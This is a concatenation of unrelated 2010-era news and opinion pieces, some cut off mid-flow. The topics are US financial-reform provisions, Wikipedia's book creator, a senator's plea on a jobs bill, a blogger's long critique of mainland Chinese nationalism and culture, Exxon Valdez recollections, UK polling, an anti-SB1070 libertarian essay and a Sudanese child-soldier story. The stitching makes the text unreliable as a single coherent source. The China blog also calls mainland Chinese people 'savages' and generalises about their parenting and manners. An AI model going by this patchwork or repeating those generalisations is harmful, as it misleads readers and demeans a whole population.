Establishes a process for winding down systemically interconnected firms , similar to what the FDIC currently does with banks
Houses a new Bureau of Consumer Financial Protection at the Federal Reserve , with the authority to make and enforce rules about products like checking accounts , mortgages and payday loans
Requires most derivatives to be traded on exchanges and funneled through third - party clearinghouses .
Makes banks spin off their derivatives units into separate businesses ( we ’ll see if this particular provision survives the next round of negotiation )
Restricts banks from trading in their own accounts just to make money , as opposed to serving their clients
Sets up a new authority to act as an intermediary between companies looking for credit ratings on complex products and the ratings companies that produce them
And now some of the less - noticed provisions .
The bill :
For all the scare - mongering about books and reading , first , the TV should have killed them , now it ’s the Internet , people seem to be doing a lot more reading than ever before .
Still , all the content online has spoiled us and we ’ve come to expect being able to access any information at any time .
Luckily , there ’s a project that brings the best of both worlds .
Wikipedia has partnered with PediaPress to offer users a way to create fully customized books with content from Wikipedia and the program has now been extended to the English language version of the site .
“ That 's it , the book creator has gone live in the English Wikipedia !
A few hours ago , the book creator has been made available to all users of the English Wikipedia .
This feature , which allows all readers to create books from Wikipedia articles , has been until now only available to logged - in users .
It has been available in other Wikipedias for a longer time , it 's now available on the English Wikipedia , for all , without restrictions , ” PediaPress announced .
Users will notice a new “ Create a book ” link to the print / export section of the left sidebar on the Wikipedia main page .
Following it will enable them to put together a book for printing centered around any topic and including any content on Wikipedia .
Users will also be able to add their own content to the book as well .
They will then be able to order the book from PediaPress or just download it as a PDF .
The books are available as a paperback for now , but hardcover options will be added in the future .
The price starts at $ 8.90 , but it varies depending on the size of the book .
The books should be ready to ship in two days after creation .
The move was revealed a couple of months back , when Wikipedia announced the switch to the new Vector theme .
Just got off a conference call with Sen. Debbie Stabenow ( D - MI ) and she begged for our help in getting people to flood their local senators ' offices for the jobs bill now being filibustered by Republicans .
" We do n’t have even one Republican willing to help us break this filibuster , " she said .
" We have every anticipation that we will not have the votes .
It ’s become very clear that the Republicans in the Senate want this bill to fail .
" It 's a cynical move , because it does n’t serve them in terms of their elections this fall .
They have decided they want this economy to fail , and they ’re willing to take the country down with them , " she said in an emotional conference call .
Republicans have claimed that the extended unemployment benefits can't be covered as an emergency .
" If 15 million people without jobs is n’t an emergency , I do n’t know what is , " she said .
Stabenow said Democrats have paid for the job provisions in this bill .
" When you look underneath , they [ Republicans ] are protecting wealthy investors who are sending jobs overseas and the big oil companies , " she said .
The Democratic bill removes tax incentives for sending jobs overseas , and increases the charge per barrel for cleaning up oil spills .
" We desperately need to keep this economic recovery going .
Unemployment benefits help people keep food on the table , and a little gas in the car to go look for work , " she said .
" The Republicans are counting on the fact that no one ’s going to know what ’s going on here .
It would help us if offices were flooded with emails , and phone calls and outrage when we come back next week . "
From Mother Jones :
ORIGINAL DATE OF WRITING : Early May
I ’d like to bring light to a huge issue currently present in China .
Just to reiterate information from previous writings , with China ’s present - day government , the people only get limited access to information , nationalist curricula in schools , and further propaganda from those citizens who grew up with the propaganda created after the founding of the PRC .
A part of the propaganda creates what would best be described as a “ clash of cultures . ”
It is largely witnessed in China that the people are always thinking that the “ West ” hates China and Chinese people must stay “ harmonious ” and “ love China ” in order to stand up against the “ West . ”
The first thing I hate about this is how Chinese use the term “ West . ”
It ’s amazing how ignorant of a term it is to use .
For example , a common term in China is “ Western media . ”
Most Chinese hate the Western media and think that all are “ anti- China ” and none can be trusted .
Firstly , the West is very diverse .
It would be an insult to the Dutch to be called the same as the Americans , and vice - versa .
Simply look at the European continent ; there are huge diversities between countries ( this can actually be used as one way to show how governments can strongly influence people , but that is for another topic ) .
The West has different languages , cultures , political beliefs , religious beliefs , cuisine , standards of living ; the list can go on for pages .
Do those in the “ West ” ever refer to those in the “ East ” the same way the Chinese do ?
Definitely not .
Of course , there are some statements in which “ East ” and “ West ” are acceptable and the phrase “ East meets West ” is quite common .
But what most of the world realises is that the cultures and countries in the East are very diverse .
The Chinese are always saying all the Westerners are pretty much the same .
They will say there is pretty much no difference between the Swedish media versus the American media .
What if the Westerners said that all Easterners were pretty much the same .
What if they said that the Chinese and Japanese are pretty much the same ?
If some foreign media were to do that , it would cause an outrage among many in China .
Now , of course , if the media just reports someone saying such , as was the case with Paris Hilton , it wo n’t have such a negative effect .
Yet , if the media in general tried to always make it seem that China and Japan were the same , then that would be a cause of anger and outrage in China .
This is what the Chinese media does to the West though and it goes anger me quite a bit .
If only most foreigners could read Chinese … what a shock they ’ll be in for .
Secondly , what Chinese fail to realise is that media in many countries , including most Western ones can be very critical of its own government and country .
The little criticism of China and the Communist Party in Chinese media needs to be approved by the Party and the Party is very calculated in what criticism it lets out .
Generally the only criticism that it lets out actually helps improve its image in many ways .
For example , it lets out criticism on corrupt local government officials , yet the media reports will portray the huge efforts the Central Government are currently taking to tackle corruption , leading to pride amongst the Chinese people .
Yet , with many foreign media , the government has very few controls , and therefore much domestic news can be negative .
Actually , looking at foreign media , I really think that there is a disproportionate amount of positive news relating to China , when looking at the little amount of positive domestic news they report .
What ’s wrong with the foreign media ?
Is it scared to exercise the free speech it is so lucky to have because of a backlash in China ?
The more balanced reporting of foreign media is one reason Chinese hate the “ Western media . ”
China simply does not report bad news in the same manner most media outlets do ( actually it reports quite a bit of negative news on foreign countries , yet why would the Chinese hate that ? ) .
Secondly , there is a saying that is something similar to , “ a happy customer tells one person about a satisfied product purchase , while an unhappy customer will tell ten people about his or her dissatisfaction . ”
Anyone who studied marketing or business will know about this .
This is especially the case in China ( both in a political sense and a consumer sense , as word of mouth is a popular in China ) .
As an example , we could grab the 10 most recent BBC News reports related to China .
Let ’s say eight out of ten are generally positive ( talking about economic growth , China becoming the second largest economy , a story on migrant workers now making more money at home due to government initiatives , a story on the success of China ’s first business owners , etc. ) .
The “ negative ” articles generally deal with China ’s pollution problems or arrests of political activists such as Liu Xiaobo .
Let ’s say a Chinese individual reads these ten articles .
It ’s highly unlikely that he would mention any of the positive ones to anyone .
Yet , if a “ negative ” one angers him or her , then the individual is likely to express his anger to other Chinese .
In China , very few read foreign media actually , even those with excellent English skills .
Therefore they wo n’t access sites such as BBC and CNN ( which are actually accessible in China for reasons I explained in my Google post ) .
The main way of seeing foreign media for Chinese individuals is if it is reposted on BBS , such as Sina or MOP .
Yet , when foreign media is posted on these BBS , it is almost always because anger is being expressed at “ Westerners ” who “ hate China . ”
Therefore the little foreign media which Chinese do see is just a small selection of those which are critical of China .
Actually , in many cases , the articles are n’t even critical of China , but simply reporting on some event which shows a negative side of China .
I must really warn my country citizens that failure to accept criticism and to criticise what you love ( your country ) will only make it worse .
If you do n’t want to criticise China , how do you expect it to improve ?
( Just to clarify , I realise that some types of criticism can get you arrested here , but what I ’m talking about is that you have to stop blindly criticising those who criticise China and maybe take a good look at what they are saying and do n’t just jump to conclusions that someone “ hates China ” just because they are reporting something bad about China .
You can be arrested by the evil government which I work for some sorts of criticisms , but you ca n’t be arrested for not criticising those who criticise China ) .
With this example of foreign media , I am just trying to help my readers understand where the “ culture clash ” comes in .
So , most Chinese think that they should retain their culture and avoid too much foreign influence .
Well , this is generally an alright argument in such debates .
Yet , in China ’s case …
Let ’s start with something which I love most about China .
China arguably has had the richest history and past culture than any other country .
While I wo n’t bore you with a history lesson , it is just unbelievable how rich and cultural the history of China is .
Anyone reading about all of the dynasties and achievements of China is the past is bound to be captivated by our history .
China ’s historical influences can be traced to countries all over the globe .
After all , we did provide the world with a number of great inventions , such as the compass , printing , paper , and gunpowder .
These are generally called the “ Four Great Inventions of China . ”
Yet , along with many scholars , I think that too much emphasis is put on these four inventions , as China provided the world with many more significant inventions .
For example , while we largely use chopsticks to eat , the first known fork in the world was from China .
We also invented toilet paper , which everyone can appreciate .
So with all of China ’s great history ( generally when Chinese speak about history they state that China has around 5,000 years of rich history ) , it can be understandable that some traditionalists may believe in some “ clash of cultures . ”
Yet , here ’s the interesting thing , it ’s not the older generations who are always talking about some “ clash of cultures ” and how China has to oppose the “ China - hating West . ”
It ’s the young ones which are always going on nationalistic fervours , denouncing those not from the Mainland who dare criticise China .
It ’s crazy , ca n’t those Chinese who always use the “ 5,000 year history ” defence , see that modern - day mainland China already threw away most of its culture and history ?
And I do n’t view buying imported cars or bags as throwing away history either .
People who use “ China ’s great history ” in stating a “ clash of cultures ” are only hurting themselves with their poor knowledge and debating skills .
There are too many examples to provide about China throwing away its history to put many of them in this writing .
Yet , I ’ll provide a few :
Firstly , while most Mainland Chinese will not realise just how large the extent was , the Cultural Revolution pretty much just threw away most of China ’s history .
Currently in China , much of the Cultural Revolution is viewed as one of the very few mistakes Mao Zedong made .
Yet , despite this official “ mistake ” statement , most Chinese just cannot realise how large of a mistake the cultural revolution was .
The Revolution was launched in 1966 , so many Chinese born after the Revolution will be unaware of the devastating effects it had on the country .
In addition , many young adults , teenagers , and children fell victim to the propaganda machine and really did n’t quite grasp how horrible that period of time was .
I have friends who were in their youth during the Cultural Revolution .
They were from intellectual families , who were sent to the countryside to become farmers during the Revolution .
My friends stayed in the cities away from their parents , forced to the countryside , to attend school ( which were actually just brainwashing machines ) .
Their lives were torn apart due to the Revolution , yet they still support Chairman Mao to this day and do n’t seem to harbour any bad feelings about the Revolution .
I am unable to speak my political thoughts to these friends of mine .
Yet , when speaking to their parents , I am able to exercise my free speech .
The older generations have seen a lot more .
While times were not good in China before the founding of the PRC , they at least could see what the Communist Party was doing and avoid falling victim to the propaganda machine .
In this world , it is generally the younger generations who move a country forward in the right direction , while the older generations are more conservative or cautious .
In China this is not the case .
Much of the older generation is much more educated , knowledgeable , and less hateful towards outsiders than the younger generations , which have been plagued by propaganda .
Yet , this phenomenon is for another entry .
I am simply trying to show that despite lives and families being torn apart , many Chinese just fail to realise the evils of the Cultural Revolution .
With the Cultural Revolution came the destruction of pretty much everything Chinese .
Beautiful cultural sites were torn apart , writings and philosophy were burnt , culture related to ethnic minorities were destroyed ( such as thousands of monastaries ) .
The Party wanted to pretty much rid China of everything and start anew , with everyone following the thought of the party .
The new China was only supposed to have Mao as its culture and lifestyle .
Even the Chinese language was ruined in the Revolution .
The Chinese writing was changed to simplified - Chinese , which is still used today in the Mainland .
Traditional Chinese was pretty much banned and books in traditional Chinese were burnt .
The book burnings of language , culture , and philosophy always trigger my mind to a relation to what happened in Nazi Germany .
It may be hard for many to understand , but Chinese writing is absolutely beautiful .
The characters have meaning and lots of history .
When the Party changed the writings for political reasons to simplified Chinese , that history and meaning was thrown away .
Sure , simplified Chinese is easier to write , but that is not the reason it was introduced as many mainland Chinese may think .
I grew up with simplified Chinese , yet after really taking time to study some traditional Chinese , I simply cannot stand simplified Chinese .
The meaning of many characters have been erased , just as the history of China was erased in the Mainland by the government .
I just have to thank Hong Kong and Taiwan for keeping traditional Chinese alive and not trying to erase history .
Since much of history in the mainland has been erased , what is modern - day Chinese culture ?
Well , that ’s open to interpretation , but I ’ll provide a few major points of what China is like today :
Sometimes I like to joke that the Chinese people are the most capitalistic people on Earth .
Of course our economic system is still not super capitalistic , yet the minds of the Chinese people seem to be filled with red 100 RMB notes .
The rapid economic growth of China has just thrust the Chinese people into a more enjoyable lifestyle and standard of living .
Yet , it seems that with China ’s newfound wealth , enlightenment has n’t followed .
What has followed is unrestrained greed .
Mass corruption has followed and people are doing whatever it takes to get that new car , flat screen TV , and other luxuries .
The evils that have come along with our new wealth are apparent in nearly every aspect of our society .
Take the tainted baby milk formula incident for example .
It is sickening to see that people will put babies at harm just for a little savings in cost .
So , you kill babies for a few thousand dollars .
What is wrong with my country ’s people today ?
It is sickening that China has come to this today .
Actually , I ca n’t even blame my government for all of this .
It ’s really more the fault of the people than the government in this case .
Of course , the government is also largely at fault .
For example , in trying to save its reputation in such a large scandal , the government largely said it would toughen up measures to prevent such .
Yet , instead of having some third - party oversight team to evaluate the milk powder , the government had the company itself oversee the production and quality control .
Pretty much , instead of having a government watchdog , the government made the company its own watchdog .
This is perhaps the stupidest thing I have ever heard in the past decade .
I do n’t even need to further explain the ridiculousness of such .
Yet , the tainted milk is just one case out of countless that we do not know about .
Recently there has been a scandal about restaurants buying used cooking oil which has been fished out of the sewer systems ( easy to do , as oil is lighter than water and floats ) .
Media reports in China have stated that around 1 in 10 meals you buy outside will have this sewage oil ( and of course , there is always the possibility that the numbers could be much higher ) .
This scandal actually occurred around a year ago and the government did n’t really act on it , and it has just resurfaced again recently .
Now let ’s talk about the Chinese people .
Wealth does not bring knowledge , education , or class in most cases .
Many in China got wealthy by corrupt means ( which is why many Chinese hate the wealthy , which is also somewhat of a problem in itself ) .
Much of the world learnt about some etiquette problems which Chinese have during the Beijing Olympics .
The Chinese government actually had to publish guidelines to the Chinese people , such as not to spit , push in queues , litter , etc ( of course those in the government also have the same etiquette problems .
Walk into a police station and it is n’t uncommon to see the police smoking in the non-smoking police station ) .
Not to be mean , but sometimes Mainland Chinese people are like savages .
They ’ll trample other Chinese just to get a seat on a bus .
Wealth has n’t changed that .
Go to an upscale shopping centre .
You have millionaires who spit onto the marble floors before walking into the LV store .
Walk onto the street , and people are littering , always using foul language , drivers are overly aggressive to pedestrians , etc .
When the Chinese leave the streets , they go home , perhaps watch some propaganda on TV , and practise the horrible internet culture I wrote about in the entry relating to Google .
There is just no class , concern for others or the environment , or etiquette whatsoever in modern day China .
Let ’s discuss some family life now .
Traditionally , family life has been strong in China .
Elders are to be respected and children should take care of their parents when they reach old age .
To some extent , this life is still present .
Grandparents are still pretty respected .
Children generally move out of their homes at a later age than those in many countries ( yet , this may largely be due to the hugely over - inflated housing market in China ) .
Yet , I must say , there is a lack of activity amongst families .
Many parents in China simply do not have good parenting skills .
It seems as if parents yell at and hit their children for everything .
It ’s very common to see mothers screaming at and slapping their young children on the streets , stores , or other public places .
Most of the times , the children have done nothing , except to accidentally trip or drop some candy .
Mainland parents on holiday in Hong Kong or Singapore always attract attention to themselves to the disgust of the locals by abusing their children .
Then when the children grow older , school seems to take over their lives .
I guess it is a good thing in one way .
Many Chinese students study quite hard .
There is a culture of doing well at school in China .
This is especially true in today ’s China , with so much more money and growth .
Parents want their children to do well in school in order to have a good future and lots of money .
Yet , the school system in China is absolutely horrid .
It ’s full of propaganda and does n’t encourage independent thinking .
In addition , it does n’t make the students adept in communicating well with others .
The Chinese school system largely just focuses on increasing nationalism and rote memorisation .
It does n’t push for innovation or problem solving .
Therefore , I really feel that students are really just torturing themselves for no good reason by studying so hard .
The pressure is immense on the students and the stress has actually lead many students to commit suicide .
In addition , it takes students away from their families , as much time is spent on studying .
Now , let ’s move forward to after education .
Marriage is a highly discussed topic in China .
There is strong cultural pressure on people to marry , especially women .
Parents are always introducing their daughters to potential husbands .
The problem is , in modern - day China , in many cases , marriage is n’t done out of love .
It ’s usually done for financial reasons .
Many parents usually wo n’t let their daughters marry a man if he does n’t have a car , apartment , and decent salary .
That ’s ridiculous .
Firstly , many in China cannot afford to buy an apartment , and therefore must rent .
Secondly , it ’s love that counts , not money .
I really wish Chinese people would stop thinking with 90 % of their brains filled with thoughts about money .
My parents and grandparents all married out of love and not financial reasons .
I am lucky in that they have always allowed me to be with who I want and have never pressured me in such matters .
The current generation of Chinese really have to put their priorities straight .
And talking about love and marriage , let ’s talk about Chinese in extramarital relationships .
Many outside of China will generally think of Chinese as very sexually conservative .
In some ways , yes , we are .
Yet , it is absolutely surprising how many Chinese have sexual relationships for money .
I always joke around saying that China could drastically increase its GDP if it included all of the sex - for - profit that goes on in China .
First thing many foreigners may realise about China , is that it is filled with prostitutes , despite being illegal in China .
I moved into a new apartment around two years ago in a pretty well - off district of a major Chinese city .
Over the past two years I have collected hundreds of advertisements for sexual services that have been slid under my door .
I generally get two to three a week .
Actually this would generally be fine .
If someone wants to go to a prostitute , it ’s their own choice and government should not interfere in such .
Yet , the problem in China is that prostitution is illegal and most girls are trafficked and slaves .
If you use prostitution services which are not regulated strongly by the government , you are almost always likely to be committing an act of rape , as the prostitute will most likely be forced against her will .
The way my government and society treats and views these women who are actually slaves is absolutely disgusting .
Now we move onto something quite interesting .
It ’s the high occurrence of mistresses in China .
Many wealthy men and government officials in China have these “ second wives . ”
Many have third or fourth wives as well .
These girls are not forced against their wills .
Actually , this is so common in China .
Many guys have placed advertisements in public places for a mistress , asking for a CV to be sent to them .
They generally receive quite a few CVs .
A mistress is actually quite a desirable job in China .
For pay even as low as 10,000 RMB a month , many would be willing to be a mistress .
Again , I am fine with this practise .
It ’s really all about free choice .
Now , of course , I do not advocate cheating on your significant other , but I do not believe government should interfere in these private matters .
I am just showing this example to show that China really is money crazy now .
To sum it up , my take on modern Chinese culture is this : desire for money , not caring for others , having poor manners and etiquette , having poor family ties , and stressing yourself for a semi- decent future which could be easily attainable in most other countries , but not in China largely due to the government .
In modern Chinese culture , I hardly see any of the traditional Chinese values ( from the 5,000 years of history ) which Chinese people always take so much pride in .
We do n’t even write proper Chinese anymore .
Let me discuss a recent event which I find absolutely silly .
Recently the Chinese government required television stations to stop using English abbreviations ( such as MP3 , CPI , WTO , NBA , etc. ) in broadcasts .
The full Chinese name must be used .
Most Chinese people disagreed with the government ’s decision .
They said that the Chinese names were too long and many Chinese are not familiar with the Chinese names , especially for terms relating to technology .
In addition , a few of the highly educated opponents argued that China already does enough damage by changing all foreign names to Chinese ( For example , in a football match broadcast in the UK , the commentators will say a French player ’s name in French , albeit with an accent .
Yet , in China , all the foreign names will be changed to a Chinese equivalent ) .
Those in favour of the government ’s decision had a few reasons .
First were the nationalistic reasons about how Chinese must be preserved ( which is extremely stupid to say considering that you already use a ruined form of written Chinese ) .
Then there were the more reasonable people .
For example , many older Chinese or less educated Chinese wo n’t know what GDP or CPI means .
In the end , I concluded that the abbreviations should still be used , yet with the full Chinese name in brackets within the subtitles ( mostly all television broadcasts in China include subtitles as there are many spoken dialects and languages within China ) .
After all , even in Hong Kong the Chinese broadcasts do n’t use terms such as “ GDP ” or “ CPI , ” even though almost everyone in Hong Kong know what these terms mean .
This leads me to Hong Kong and Taiwan , particularly Hong Kong .
To me , Hong Kong is one of the most special places on Earth .
There is simply no place like it .
There is no mindset of a “ clash of cultures ” in Hong Kong as there is in the mainland .
Hong Kong is actually very international in many ways .
It is a food heaven , with foods from all over the world .
There are imported products from all over the world .
In addition , a lack of propaganda does n’t lead to such silly thoughts which are held in the mainland .
Pretty much , Hong Kong has a British influence mixed with traditional Chinese culture .
It ’s a beautiful mix and is one of the reasons Hong Kong is so successful .
One thing that Mainland Chinese have to realise is that Hong Kong actually practises more Chinese culture than the Mainland does , yet it also practises somewhat of a “ Western ” culture .
On the other hand , the Mainland hardly practises Chinese culture , yet a culture of greed , hate , and ignorance .
Taiwan is also beautiful for Chinese culture .
Neither Hong Kong or Taiwan had their histories and cultures erased by the government .
Go to Taiwan and you ’ll see just how much traditional culture exists in a nice mix with modern culture .
There are plenty of temples in Taiwan from ancient Chinese beliefs .
In addition , these temples are free of charge .
Donations are accepted , yet it is up to the individual .
If an individual respects such culture and feels that he or she wants to help out in maintaining it , then that is what is really important .
In the Mainland , most temples require a charge to enter .
That is not culture .
That is greed .
People should not have to pay to view history and culture .
Such should be a basic right .
Everyone should have equal access to knowledge and history .
It ’s absolutely disgusting for the Mainland to charge for such .
The donation system should work in the Mainland as well and should definitely be used opposed to an entrance fee .
I ’ll leave further impressions of Taiwan and Hong Kong in other entries .
Yet , I am one of the very few who have been lucky enough to see what these places can teach China ( I had to use a faked passport to travel to these places , which some may say is wrong to do , but I really had to learn the truth about these places , rather than the propaganda the Central government wants Mainland Chinese to believe ) .
In conclusion , this “ clash of cultures ” is just absolutely ridiculous .
I do realise that it is not completely the fault of the Chinese people , but it really is n’t completely the fault of the government .
Chinese people realise that their media is restricted by the government , but never really question why .
In addition , they denounce foreign media .
There is so little free thinking in this country , it pains me .
I realise that the economic growth has made people quite content with the government and feel huge amounts of national pride , but please try to not always build up these ridiculous nationalistic fervours .
I ’m worried because China is very likely to become a superpower in the near future .
If the Chinese people always have false beliefs and thinks the entire world is against them and their recent development , the outcome could be very frightening .
I really wish that my country was not filled with so much hate .
History has showed us what nationalism has caused , and I really do not want to see my country cause such problems .
Have you never thought that maybe all of this anti-Western sentiment is just built up by our government to increase support of the government ?
How is it that Hong Kong and Taiwan can exist so well with both Chinese culture and foreign cultures without hatred ?
Have you never thought about that ?
Saying that Chinese culture is being ruined by the “ West ” is just pure stupidity .
We Mainland Chinese have already thrown away our beautiful culture in our blind support for the government and “ love for China . ”
What is there to love now ; the greed , savage manners , inequality , unaffordable housing , students toiling away their lives learning fake propaganda ?
If you really love your country , you would have the decency to accept criticism and criticise it yourself .
Otherwise , how will you improve it if you are so content with the way it is now ?
Image caption The Exxon Valdez ran aground on Bligh Reef on 24 March , 1989
As experts try to assess the long - term impact of the spill in the Gulf of Mexico , the BBC World Service asked two people who experienced the Exxon Valdez disaster in 1989 to look back and consider its impact on Alaska 's communities .
" We just had n't been ready for a spill , " said John Devens , who was the mayor of the small port of Valdez in 1989 .
Exxon Valdez , the giant oil tanker that ran aground , was named after his town .
The town was fond of the oil industry - it received millions of dollars of revenue by taxing the oil companies - but things changed when the massive ship began to spill thousands of barrels of oil in Prince William Sound , poisoning the water and damaging Alaska 's spectacular shores .
When John heard about the disaster on 24 March , he chartered a plane to assess the damage .
Image caption Anne was nicknamed ' Madam Godzilla ' for pushing for more resources
" We flew over Exxon Valdez , the oil there was probably four feet deep , " said Mr Devens , adding that calm waters in the strait had created a " lake of oil " , holding the spill in one area .
" It 's unusual in March for us to have that good weather , " he said .
But after several days , it started to spread , damaging over 1,250 miles ( 2,000 km ) of coastline .
Anne Castellina was superintendent at the Kenai Fjords National Park , an area that was hit several weeks after the actual disaster .
" We were in such a state of shock , we really could n't believe it , " she said .
When she heard about the oil hitting the park shores , she headed to nearby Pony Cove , a wall of rocks on the coast , to inspect the damage .
" We noticed there was this bathtub ring and I thought it was algae or mussels or something at first .
And we got really close to the wall , and we realised it was oil .
It was all oil .
" We also noticed there were lots of big black blobs and we started hauling some of those out of the water , and they were dead sea otters and dead sea birds , that were totally unrecognisable because they were just completely coated with this thick emulsified oil . "
Anne said in the early stages of the spill , equipment was so scarce that people literally took matters in their own hands , using buckets to collect oil and take it to disposal facilities .
" The oil was so darn thick , they were either having to use their hands or sticks to get the oil and scrape it out of the buckets . "
Emotional price
As the clean - up operation gathered pace , the small towns on the Alaskan coast had to deal with a surge of people who arrived to help .
" Exxon would hire virtually anybody that would go on and sit on those islands and clean rocks , " said John Devens , " because Exxon threw a lot of money at this to try to get things taken care of . "
Image caption Oil residue is still found on the shores of Prince William Sound
But efforts to minimise damage to nature came at a high cost to the inhabitants .
" People who did n't get hired by Exxon were not the kind of people you wanted left over in your community , " he said , adding that the unusual influx of people created a crisis of accommodation and increased criminal activities , including violence and drug abuse .
" It tore this community apart , " he said .
Most people in the Prince William Sound area paid a heavy emotional price , including Anne , who was then a single mother in her 30s .
" It was hard on my family .
At one point my middle daughter turned to me as I said , ' I got to go to another oil spill meeting . '
And she looked at me and she said : ' Mommy we are important too . '
" And my heart just about broke . "
According to Mr Devens , it was the fishermen who lost most , and they are still suffering .
" You have fishing families that were so devastated that they 've never recovered .
And some of the species that were destroyed back in 1989 just have not come back .
" They waited all those years and they never really ever received all the compensation that they had been promised . "
Pipeline warning
One of the positive outcomes of the Exxon Valdez disaster is thought to be the introduction of federal legislation improving the safety of oil tankers .
Mr Devens believes it also brought in more investment in clean - up technology .
" Today we have world class response equipment , " he said .
It tore this community apart John Devens , Former mayor of Valdez
But he also flagged up a warning for the future .
" The big problem that I see coming is that we have 800 miles of pipeline that has not been well maintained over the years .
" And I think the next big spill will come from the pipeline . "
The issue of recovery is still contentious .
Clean - up efforts officially ended in 1992 , but one recent study has shown an estimated 20,000 gallons of oil remaining on the beaches of Prince William Sound .
According to Anne , one can even smell it in some areas .
" The oil tends to hide itself especially on these beaches where , you know , we have these huge cobbled rocks .
" It 'll go into this and come up to the top .
And then the storms will uncover it .
And then a hot day comes along , and puff , there it is again .
" It 's still there . "
You can listen to the Witness programme on BBC World Service for more on Exxon Valdez .
Tonight we have the first voting intentions since the General election .
ComRes in the Independent on Sunday / Sunday Mirror have voting intentions of CON 38 % , LAB 34 % , LDEM 21 % .
From the general election the Liberal Democrats are down and Labour up , presumably a direct defection of Liberal Democrat voters who are more inclined to Labour and opposed to the party joing the Conservatives in coalition .
41 % of respondents thought that the Liberal Democrats had sold out their principles , with 47 % disagreeing .
This included 34 % of Liberal Democrat votes .
35 % of respondents agreed with the statement that Nick Clegg should have opted for a coalition with Labour rather than one with the Conservatives , that includes 33 % of Liberal Democrats ( presumably 33 % of remaining Liberal Democrats , as opposed to 33 % of those who voted Lib Dem in 2010 ) .
ICM in the Sunday Telegraph have voting intention figures of CON 38 % , LAB 33 % , LDEM 21 % .
The figures there are almost identical to ComRes , and show the same pattern – a 3 point or so shift of support from the Lib Dems towards Labour .
ICM ’s other questions found 64 % of respondents backing the coalition as the right way forward .
Asked about specific policies , 75 % backed keeping inheritance tax and increasing capital gains tax in order to increase the personal tax allowance , 63 % supported fixed term Parliaments , 56 % backed a change to AV .
ICM also asked about the Labour leadership – 32 % backed David Miliband , 11 % Harriet Harman , 9 % Ed Miliband , 8 % Ed Balls and Burnham and Cruddas were both on 2 % .
Bear in mind , however , that leadership questions like this reflect recognition to a great degree – most people will have little or no idea who Andy Burnham or Jon Cruddas are .
If you go back to questions on the Tory leadership straight after the 2005 election Ken Clarke tended to be the winner , with Cameron around 2 % - 4 % .
The 14th Amendment is Going to Cage Us All
With all of the hullabaloo about Arizona these days over SB1070 and racial profiling , one should not be surprised when the government humbly capitulates to the will of the people , vows not to discriminate , and instead begins asking everyone for their papers in the form of national biometric identification cards .
My experiences as a part of the Arizonan coalition against this bill have been especially interesting and have seen Americans divided and conquered by the political elite once again .
I go to school at Arizona State University in Tempe , which is a few miles east of central Phoenix .
A sizable handful of libertarians including myself have been very active in the protests against SB1070 at the state capitol and elsewhere .
In my observations , there have been very few non-Latinos who care enough about the bill ’s passing to show up in protest .
By virtue of our being present , us mostly white libertarians were racially profiled and asked many sincere questions by Latino individuals regarding who we were and why we cared about the bill ’s passing , as we would not be directly impacted or negatively profiled .
We outlined the nonaggression principle for those we spoke to and summarized the idea that as long as one is being peaceful one should be left alone .
We stated that it does n’t matter what color , ethnicity , region of origin , or any other secondary characteristic one possesses , but that purely by being nonaggressive , individuals should be free to make choices for themselves on where to live and who to voluntarily associate with .
We handed out thousands of fliers on this message and generally received a very pleasant welcome .
It was not all lovely and earnest welcoming though .
I flew my Free State Project Gadsden flag and occasionally donned a Guy Fawkes mask , which created a mixture of genuine intrigue and warrantless scorn .
Many people assumed I was there in support of SB1070 because protestors who supported restrictive immigration policies showed up with Gadsden flags earlier in the week to demonstrate before loud crowds with megaphones scared them off to the indictment of “ white supremacist ! ”
One lady called me a teabagger , and one gentleman told me to go fuck myself .
I kindly alerted him that I was there in opposition to the bill , to which he replied , “ Oh , let me grab a flier then ! ”
This really bummed me out .
Any individual who flies a Gadsden flag against peaceful immigration and freedom of movement is so terribly confused that it breaks my heart .
It is the equivalent of flying a black flag for statism .
What else could “ Do n’t Tread on Me ” mean besides “ I want to be left in peace ? ”
The deradicalization of this flag as symbolized by its vulgar use in the Tea Party Movement ( when not flown by principled libertarians who sporadically pepper the Tea Parties ) means another radical symbol has been moderated ; another element in the language of revolution has come to stand for blasé reformism and some vague idea of what a ‘ just ’ government should be .
Personal Gadsden - flying experience aside , the great bulk of the rhetoric opposing this bill at the rallies and through the media has come to focus on racialized enforcement of the law and racial profiling .
Despite reassurances from SB1070 sponsor and state senator from Mesa Russell Pearce that “ Illegal is not a race , it is a crime , ” law enforcement is given quite a long reach to determine what is reasonable suspicion of being in the country illegally .
This will realistically mean that day laborers soliciting their agorist services , individuals speaking Spanish in public in an English speaking country , and eating at Filiberto ’s could be construed as reasonable suspicion of undocumented immigration status .
Brown individuals in Arizona have already been detained and arrested for not having proof of their citizenship while ‘ in ’ the country .
My friend was asked for his documents while out drinking at Tempe ’s local hot spot Mill Avenue by a cop on a Segway in a goofy but intimidating display of force .
This racialized enforcement will be short - lived however .
By focusing on the racial profiling aspects of this bill , activists neglect to address the fact that in its benevolent spirit of fairness the state will agree to treat us all as equals under the 14th Amendment and will soon be arbitrarily asking for the documents of all citizens .
Yes , the old familiar libertarian fear of “ Papers , please , ” will soon be coming to Arizona .
Obsessing over racial profiling is a good way to scare up support .
A solid chunk of Americans instinctively recoil from what is presented as a racist policy and oppose it on those words alone , but this is but one small nibble of the immigration chimichanga .
This focus obscures larger menaces that loom ahead .
I am far from the first to note that the state created an immigration problem through the welfare state .
When Arizona utilized its 10th Amendment rights to enforce immigration restrictions to protect their racket from becoming overburdened , the country at large responded in outrage .
Democrats in full Hegelian majesty are now swooping in to save the country and undocumented immigrants through biometric national ID cards and equal enforcement of mandatory identification statutes in accordance with the 14th Amendment .
The ability to remain anonymous in what is still a relatively open society is drying up .
Aw , shucks .
Look at the feds protecting our privacy and well - being .
Their concern is really quite touching .
This being primarily a racial issue illustrates the ways in which the debate has been framed to exclude from public discourse the sovereign nature of the individual , the downfall of welfare statism , and the irrationality of closed border policies .
Without tackling these core problems , repealing SB1070 will be just another example of politics as rearranging deckchairs on the Titanic .
If you are an activist regarding this issue , please join me in attempting to steer the debate away from the focus on racialized enforcement and to rally people against closed border policies and statist invasions of privacy .
Otherwise the 14th Amendment is going to back us straight up against the fence of the equal opportunity cattle yard .
Simon was 11 years old when soldiers from the Sudan People ’s Liberation Army ( SPLA ) forced him into the military .
“ When the SPLA came to us , the older people ran away , ” Simon , whose name has been changed to protect his identity , explained .
“ I did n’t run because I was a child .
So they captured me .
When I refused , they kept beating me .
I did n’t want to go but they forced me to join the SPLA . ”
The SPLA , the predominantly Christian Black African south ’s military , fought against the mostly Muslim Arab north in a two decade - long civil war that left two million dead .
Both armies enlisted children in their ranks .
